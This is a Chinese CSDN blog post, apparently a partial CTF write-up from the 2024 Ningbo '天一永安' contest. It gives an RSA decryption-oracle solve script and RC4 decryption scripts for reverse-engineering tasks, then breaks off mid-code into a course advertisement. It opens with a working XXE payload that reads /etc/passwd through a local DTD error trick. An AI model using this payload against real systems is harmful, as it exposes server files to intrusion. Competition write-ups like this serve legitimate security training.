2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP(1)

于 2024-05-16 02:20:24 发布
阅读量211 收藏
点赞数 3
分类专栏: 程序员 文章标签: web安全 python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970989/article/details/138932563
版权 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>

CY1

import websocket
import json
from Crypto.Util.number import \*
from gmpy2 import \*

def get\_flag(ws):
    x = ""
    ws.send(json.dumps({"cmd": "get\_flag"}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

def f(ws, cmd, data):
    x = ""
    ws.send(json.dumps({"cmd": cmd, "data": data.zfill(512)}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

uri = "ws://xxx.xxx.xxx.xxx:xxxxx"
ws = websocket.create_connection(uri)
c = int(get_flag(ws), 16)
c2 = int(f(ws, "enc", hex(2)[2:]), 16)
c3 = int(f(ws, "enc", hex(3)[2:]), 16)
c4 = int(f(ws, "enc", hex(4)[2:]), 16)
c9 = int(f(ws, "enc", hex(9)[2:]), 16)
n = GCD(c2\*\*2 - c4, c3\*\*2 - c9)
enc_flag_2 = c2 \* c % n
flag_2 = int(f(ws, "dec", hex(enc_flag_2)[2:]), 16)
print(long_to_bytes(flag_2 // 2))

RE1

key和key1用crypto1算法混淆,再用cry2算法吧加密后的key混淆

def init(s, key1):
    key_length = len(key1)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key1[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt1(s, key):
    v5 = 0
    v6 = 0
    encrypted_key = bytearray(key)
    for i in range(len(key)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_key[i] ^= key_stream_byte
    return encrypted_key

def before\_main(key, key1):
    s = list(range(256))
    init(s, key1)
    encrypted_key = crypt1(s, key)
    return encrypted_key
key1 = b"keykey" 
key = b"ban\_debug!" 
encrypted_key = before_main(key, key1)

print("Encrypted key:", encrypted_key)


def init(s, key):
    key_length = len(key)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt2(s, data):
    v5 = 0
    v6 = 0
    encrypted_data = bytearray(data)
    for i in range(len(data)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_data[i] = (encrypted_data[i] - key_stream_byte) % 256
    return encrypted_data

def decrypt2(s, cipher):
    decrypted_data = bytearray(cipher)
    v5 = 0
    v6 = 0
    for i in range(len(cipher)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        decrypted_data[i] = (decrypted_data[i] + key_stream_byte) % 256
    return decrypted_data
key = b'key'
cipher = bytes([0x4e, 0x47, 0x38, 0x47, 0x62, 0x0a,  0x79, 0x6a, 0x03, 0x66, 0xc0, 0x69, 0x8d, 0x1c, 0x84, 0x0f, 0x54, 0x4a, 0x3b, 0x08, 0xe3, 0x30, 0x4f, 0xb9, 0x6c, 0xab, 0x36, 0x24, 0x52, 0x81, 0xcf])
s = list(range(256))
init(s, key)

decrypted_flag = decrypt2(s, cipher)
print("Decrypted flag:", decrypted_flag.decode())

第一个脚本得到加密flag的key,使用第二个脚本解出flag

RE2

修改UPX特征码后upx -d脱壳,IDA分析,rc4改了轮数

image-20240505131620532

并且key在加密之前修改了

image-20240505131656187

解密脚本

unsigned char sbox[size] = {0};
void init\_sbox(unsigned char \*key)
{
unsigned int i, j, k;
int tmp;
for (i = 0; i < size; i++)
{
sbox[i] = i;
}
j = k = 0;
for (i = 0; i < size; i++)
{
tmp = sbox[i];
j = (j + tmp + key[k]) % size;
sbox[i] = sbox[j];
sbox[j] = tmp;
if (++k >= strlen((char \*)key))
k = 0;
}
}
void encode(unsigned char \*key, unsigned char \*data)
{
int i, j, k, R, tmp;
init\_sbox(key);
j = k = 0;
for (i = 0; i < strlen((char \*)data); i++)
{
j = (j + 1) % size;
k = (k + sbox[j]) % size;
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/d1238e33d3b61e78daf669d907e41fb7.png)

![img](https://img-blog.csdnimg.cn/img_convert/bbbdd564b44dbffb2916d286664cc23e.png)

![img](https://img-blog.csdnimg.cn/img_convert/300573595cd53df4904dd87b8a6da773.png)

![img](https://img-blog.csdnimg.cn/img_convert/8bbe9af800c5aa39ca5f066c97b305a4.png)

![img](https://img-blog.csdnimg.cn/img_convert/e85de5f55ef3e42b35adbe0b233773cc.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84970989
关注
专栏目录
第四届山东省网络安全技能大赛 write up
熹微晨光的博客
11-05 3328
第一题:下载下来并解压后发现是一个没有后缀名字的文件  很简单了  第一步想到右键查看发现乱码以MZ开头  ok  好吧  .exe文件  改完之后就能运行了  不过无法得到key  继续看源代码  ctrl+f查找Key关键字  发现了一串字符串 “.anyuntec.com”   好吧  脑洞题  安云的网址  www.anyuntec.com  ok  得到了  KEY{iimmq
网络安全培训方案(1).docx
06-09
web服务器的banner获取与隐藏 第一节:web服务器banner获取(全部中间件) 实验一:web服务器banner获取 第二节:web服务器banner隐藏(全部中间件) 实验二:web服务器banner隐藏 第二章:目录遍网络安全培训方案(1)...
2022宁波市第五届网络安全大赛(训练赛Misc部分)
weixin_52961098的博客
05-17 5209
Search evidence 在某银行在近的一次项目中,关键数据疑似泄漏。经过某种手段已经把嫌疑锁定在嫌疑人A身上了,但是嫌疑人A的U盘中除了一张图片之外,没有发现任何相关的信息。你能帮助公司找到他泄漏数据的确凿证据吗?Flag格式flag{xxx}. 附件打开 解压密码在注释部分 解压之后用010打开,Flag字符串在右边这一列 FLAG{QohLfitIPtByVxux} Key Evidence 银行近的一次项目中,某个服务器的密钥被泄露,并被经过某种手段已经把嫌疑锁定
2022宁波市第五届网络安全大赛(初赛Misc部分
weixin_52961098的博客
05-17 2111
听说线下决赛有菠萝包吃? 解题情况:5题解4,一个三血,哆哆嗦嗦进决赛 BlackAndWhite 打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张 脚本如下 white = open('D:/Users/huawei/Desktop/target/0.png', 'rb').read() black = open('D:/Users/huawei/Desktop/target/1.png', 'rb').read() ​ flag = '' ​ for i in range.
宁波市第三届网络安全大赛-WriteUp(Misc)
pone2233的博客
07-07 3558
文章目录内心OSMisc | 完成 | 第一Misc | 完成 | BBQMisc | 完成 | 看图说话Misc | 未完成 | 等等我Misc | 未完成 | 抓我把 内心OS 第一次参加这种大型比赛,实力较菜,请师傅们多多指点 Misc | 完成 | 第一 下载文件,看一下doc没有任何问题, 没有发现任何隐写,然后修改文件后缀名docx为zip,解压 将所有解压后的文件打开,用notepad++ 在此全部文件中搜索flag字段,即可找到flag Misc | 完成 | BBQ 庞大的base6
天一永安2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛-部分MISC、WEB、RE-WP
weixin_62467741的博客
05-05 834
1.png打开,一眼像素有问题,stegsolve嗦一下,发现只有RGB的第七个通道有数据块并且部分黑,直接过滤7通道,得到一堆hex,hex转码。简单审一下,就是flag字符串和key进行了crypt2处理,继续追踪key,发现key是由key和key1两个变量经过crypt1处理得到。F12被禁了,URL前加view-source:,源码得到flag。2.搜一下发现是日语歌,发现前面有空的字符,连起来就是key的提示。先逆key,追踪key和key1,得到值,写解密脚本。3.直接搜这个解密网站。
山东理工大学首届“安云”计算机网络与信息安全竞赛内容和规则介绍.pdf
12-20
山东理工大学首届“安云”计算机网络与信息安全竞赛内容和规则介绍.pdf
网络安全培训方案(1).doc
06-09
网络安全培训方案旨在提升学生的Web渗透测试能力,课程涵盖了多个关键领域,旨在使学员在20天内具备一系列专业技能。课程对学生的基础要求是了解Windows、Linux操作系统以及基本的SQL语句。通过培训,学生将能够: ...
2024天一永安宁波第七届网络安全大赛极安云科战队部分WP
Geek极安云科-致力于网络安全事业
05-05 1316
天一永安2024 宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛大赛竞赛形式一、线上初赛参赛人员:各单位自行选拔3人(设队长1名)组成团队,不足3人不允许参赛。竞赛时间:8:30-12:00(比赛3个小时,不含签到时间)竞赛模式:CTF解题模式(排名图为赛时截的,最终排名应该是50多,行业组排30多)Geek极安云科战队WriteUp解题情况:Web1、Web2、RE1、RE2、CY1、MISC1。
2022-2024参加网络安全竞赛wp(持续更新)
苦行僧的妖孽日常
10-24 5543
2022、2024中国工业互联网安全大赛核能行业赛道、2023陇剑(预选赛)、2023强核、2023工业信息安全技能大赛网络安全竞赛(CTF)的WriteUp。
2023年宁波网络安全大赛天一永安)-训练赛
weixin_52961098的博客
05-16 1080
写给新生看的,步骤又乱又多,不喜勿喷,我也不改,爱看不看。
天一永安”2023宁波市第六届网络安全大赛 re wp
Todog的博客
05-28 783
这里会看高位是0还是1,0就会触发异常,我们的sum会进行异或。一直f7,循环就跳过。upx壳,被魔改了。so文件比对,base64直接解。发现有花指令,全patch掉。发现是RC4,但是有改动。然后就可以正常f5看了。
2020宁波市第三届网络安全大赛 Web Writeup
qq_33624424的博客
07-07 4075
2020宁波市第三届网络安全大赛,比赛分行业组和院校组进行团体赛。感觉这次比赛还是很不错的~ 值得参加。 Easy_SSRF <?php show_source(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET["url"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,&nbs.
2023宁波网络安全大赛天一永安部分练习题WP
一位热爱网安的年轻人的博客
05-16 755
宁波网络安全大赛 天一永安练习题wp
2023天一永安部分wp
arcuied
05-22 1475
布尔盲注。
天一永安” 初赛 2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛 题解WP
最新发布
Jay17的博客
05-07 882
天一永安” 初赛 2024宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛 题解WP
2023宁波市赛 天一永安赛前模拟题部分wp
arcuied
05-16 5667
天一永安赛前模拟题 wp
宁波天一永安初赛 wp-AGCTS战队
akxnxbshai的博客
06-22 1072
以前的wp,发一下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值